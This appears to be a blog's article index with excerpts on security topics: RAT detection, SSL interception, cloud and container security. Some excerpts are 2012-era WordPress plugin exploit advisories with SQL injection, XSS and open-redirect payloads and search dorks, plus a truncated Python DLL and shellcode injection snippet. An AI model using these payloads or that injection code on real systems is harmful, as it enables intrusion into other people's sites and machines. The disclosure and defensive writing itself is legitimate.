Context I wrote this some time ago as an internal memo for marketing and product to help craft value propositions to sell security tools to security teams. I’ve noticed some confusion around the objectives of security teams and I’d like to share my perspective, hoping to clarify matters. Please note that these are just my opinions based on my experiences as a security persona across various organizations. What is the goal of a security program?| Articles on Cloudberry Engineering
RAT WARS 2.0: Advanced Techniques for Detecting RAT Screen Control In the landscape of web maliciousness Remote Administration Trojans 1 are not a new trend but their usage is still strong and growing steady. At its core a RAT is a backdoor facility used to let an attacker enter unnoticed into the victim computer to control it remotely: for example most banking trojan nowadays are using remote desktop modules to open a VNC/RDP channel to allow an attacker to exfiltrate the money from within t...| Articles on Cloudberry Engineering
Beyond Superfish: a Journey on SSL MitM in the Wild Recently Lenovo hit the news because they got caught installing adware on their laptops, namely Superfish, which, amongst other features, also perform SSL Mitm on the infected computer. Unfortunately, Superfish is not the only one that has been caught nullifying end-to-end SSL encryption. Many other software and services are turning this “feature” into a nightmare: result is that nowadays SSL Man in the Middle is not an uncommon scenario...| Articles on Cloudberry Engineering
I’ve been contacted by a friend seeking for help: he bought something on a random ecommerce and after 30 days nothing was shipped and no one was replying to his emails. He wanted to know if he had been scammed. In the end the item arrived and the ecommerce proven to be somehow legit and the FakeCommerce label might be a bit sensationalistc. Anyhow the quick investigation I performed was a good OSINT exercise worth a share.| Articles on Cloudberry Engineering
As stated on this announcement on Full Disclosure every major old versions of Wordpress (from 2.5 to 3.3.1) was bundling a SWF applet named swfupload.swf which is vulnerable to XSS. The original hole was found by Neal Poole. Together with Ryan we investigated a little on this issue and after perfoming a quick dork on google he noticed that a few Wordpress plugins were bundling the very same vulnerable applet. To spot all the affected plugins I wrote a quick crawl and ran it against the public...| Articles on Cloudberry Engineering
While playing around looking for a way to catch xss exploitation on a web application honeypot I’ve stumbled on the the problem of logging DOM XSS injections performed in the fragment portion of the URL. As specified by the RFCs browsers are not required to send the fragment to the server since it should be used only for client-side purposes. This is a problem in a scenario where a web app honeypot is involved because we would want to log everything that could expose a potential attack.| Articles on Cloudberry Engineering
A thing I noticed working day by day on WPScan’s vulnerability database is that many of the Wordpress (plugins) vulns disclosed are far less than the actual number of exploitable plugins. A quick trip on the official directory and a little browsing over the svn repositories will point out a lot of trivial bugs which might be worth an advisory. I am talking about low hanging fruits like unsophisticated xss and basic sqli.| Articles on Cloudberry Engineering
Snippet time! Two simple functions to inject DLL or shellcodes into running processes (x86). Enjoy: importsysfromctypesimport*PAGE_READWRITE=0x04PAGE_EXECUTE_READWRITE=0x00000040DELETE=0x00010000READ_CONTROL=0x00020000WRITE_DAC=0x00040000WRITE_OWNER=0x00080000SYNCHRONIZE=0x00100000PROCESS_ALL_ACCESS=(DELETE|READ_CONTROL|WRITE_DAC|WRITE_OWNER|SYNCHRONIZE|0xFFF# If < WinXP/WinServer2003 - 0xFFFF otherwhise)VIRTUAL_MEM=(0x1000|0x2000)KERNEL32=windll.kernel32defdllinject(dll_path,pid):""" Inject ...| Articles on Cloudberry Engineering
After some months of development xsssniper has become more stable and a lot has changed since initial releases so it’s about time to peek under the hood of current version: 0.8.x. First and foremost it’s important to highlight that the goal of this tool is to test an entire web application automatically with minimum human intervention (maybe xssnuker would be a better name!). With this in mind the biggest change has been done on the injection engine. In first versions an user intervention...| Articles on Cloudberry Engineering
# Exploit Title: WordPress Mingle Forum plugin <= 1.0.32.1 Multiple Vulnerabilities # Date: 2012/01/18 # Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.32.1.zip # Version: 1.0.32.1 You need an authenticated session to exploit the following vulnerabilities. 1) SQL Injection: POST: admin.php?page=mfgroups&mingleforum_Action=usergroups delete_usergroups: Delete dele_usrgrp%5B%5D: 1 [SQLI] Vulnerable c...| Articles on Cloudberry Engineering
# Exploit Title: WordPress Shortcode Redirect plugin <= 1.0.01 Stored XSS # Dork: inurl:/wp-content/plugins/shortcode-redirect/ # Date: 2012/01/18 # Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip # Version: 1.0.01 Vulnerability You need permissions to write a post (HTML mode) to exploit the shortcode: [redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']| Articles on Cloudberry Engineering
# Exploit Title: WordPress uCan Post plugin <= 1.0.09 Stored XSS # Dork: inurl:/wp-content/plugins/ucan-post/ # Date: 2012/01/18 # Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip # Version: 1.0.09 Vulnerability You need permissions to publish a post from the public interface: The submission form is not well sanitized and will result in stored xss in admin pages: Name field is not sanitized and i...| Articles on Cloudberry Engineering
# Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect # Date: 2012/01/10 # Dork: inurl:wp-content/plugins/age-verification/age-verification.php # Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/age-verification.zip # Version: 0.4 Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com The rendered page will provide a link to http://www.e...| Articles on Cloudberry Engineering
# Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities # Date: 01/06/2012 # Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip # Version: 1.1 1) Blind SQL Injection in shortcode: Short code parameter ‘id’ is prone to blind sqli, you need to be able to write a post/page to exploit this: [paywithtweet id="1' AND 1=2"] [paywithtweet id="1' AND 1=1"] 2) Multiple XSS in p...| Articles on Cloudberry Engineering
I wrote a little app called xsssniper to automatically test XSS injection points in target URLs. $ python xsssniper.py --url 'X' --payload 'Y' --check 'Z' What it does is scanning target URL for GET parameters and then inject an XSS payload (Y) into them and parse the response for artefacts of the injection (Z). The simplest example would be to inject <script type="text/javascript">window.alert('lol')</script> and check for <script type="text/javascript">window.alert('lol')</script>, if we ha...| Articles on Cloudberry Engineering
Quick how-to install Tor and Polipo on OpenBSD 4.8, and route almost all the traffic trough them by deafult. For simplicity I’ve installed from packages. As root: $ pkg_add tor $ pkg_add polipo Next we need to configure Polipo to use Tor and we can take advantage of the sample config file provided by Tor itself: $ cd /etc/polipo $ mv config config.old $ wget http://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf $ mv polipo.conf config The part worth n...| Articles on Cloudberry Engineering
This is a little how-to install and execute xmonad under X11.app on Snow Leopard. First thing to do (if you haven’t yet) is installing the Haskell platform. I use Homebrew as my packet manager of choice: brew install haskell-platform Next we are going to install xmonad from Cabal: cabal update cabal install xmonad Now that everything is installed correctly we need to tweak our X11.app settings in order to run nicely with xmonad.| Articles on Cloudberry Engineering
Introducing my new little creature just released in the wild: Pepbot. What? It’s a disposable temporary email service. His main goal is to help you dodge spam by providing a valid throw away mail address you can use instead of your real one. For example when you want to leave a comment on a shady blog, register to a random forum or whatever else. When prompted for a valid mail simply use whatever@pepbot.com then go to Pepbot and check your mail or forget about it.| Cloudberry Engineering
Docker and container security are broad problem spaces and there are many low hanging fruits one can harvest to mitigate risks. A good starting point is to follow some best practices when writing Dockerfiles. I’ve compiled a list of common docker security issues and how to avoid them. For every issue I’ve also written an Open Policy Agent (OPA) rule ready to be used to statically analyze your Dockerfiles with conftest. You can’t shift more left than this! You can find the .rego rule set...| Cloudberry Engineering
At Spotify, we actively manage more than 800 Google Cloud Platform projects. As such, maintaining a proper security posture at scale has proven to be a challenging task. In an effort to seamlessly audit and strengthen the security stance of our massive cloud infrastructure, we are investing various resources into building our own tools and methodologies.| cloudberry.engineering
I’ve spent a good year working on a security strategy to manage multi-cloud environments, in this article I want to share what I wish we did in advance to be better prepared.| cloudberry.engineering
Using Apps Script for scripting GSuite / Google Workplace will generate Google Cloud Platform (GCP) projects in the background.| cloudberry.engineering
Securing containers is a complex task. The problem space is broad, vendors are on fire, there are tons of checklists and best practices and it’s hard to prioritize solutions. So if you had to implement a container security strategy where would you start?| cloudberry.engineering
Identity and Access Management (IAM) is an important piece of the cloud puzzle and it’s usually a source of headaches from a security point of view. Let’s try to give some pointers from a blue team perspective. If you are a security team that just inherited a bunch of Google Cloud Platform (GCP) accounts, this guide is for you.| cloudberry.engineering
A constant source of pain in Google Cloud Platform (GCP) and everywhere else is the amount of unmaintained resources: idle virtual machines, old buckets, IAM policies, DNS records and so on. They contribute to the attack surface and the chance of a vulnerability increase with time. Shutting off resources is a such a low hanging fruit from a risk perspective that as a security engineer you should make it a daily habit. After all the most secure computer is the one that’s been turned off!| cloudberry.engineering
Public cloud providers share some security responsibility with their customers. This means that as a security practitioner, what you should take into account in your threat model is going to be different in the cloud than on premise environments.| cloudberry.engineering
Service Accounts in Google Cloud Platform (GCP) are the main vector to hack an account: it’s easy to use them wrong and end up with a compromised key and a lot of headaches.| cloudberry.engineering
I’ve built a directory of open source cloud security tools.| cloudberry.engineering
In the context of incident response lateral movement is how attackers are able to penetrate deeper inside a system. Understanding this concept is critical to contain an ongoing breach.| cloudberry.engineering
Google Cloud Registry (GCR) is the Docker container registry offered by Google Cloud Platform (GCP). Under the hood it’s an interface on top of Google Cloud Storage (GCS), and it’s so thin that access control is entirely delegated to the storage layer.| cloudberry.engineering
Securing our Cloud infrastructure is incredibly important. We are now taking another step forward by leveraging open source tools we developed in partnership with Google.| cloudberry.engineering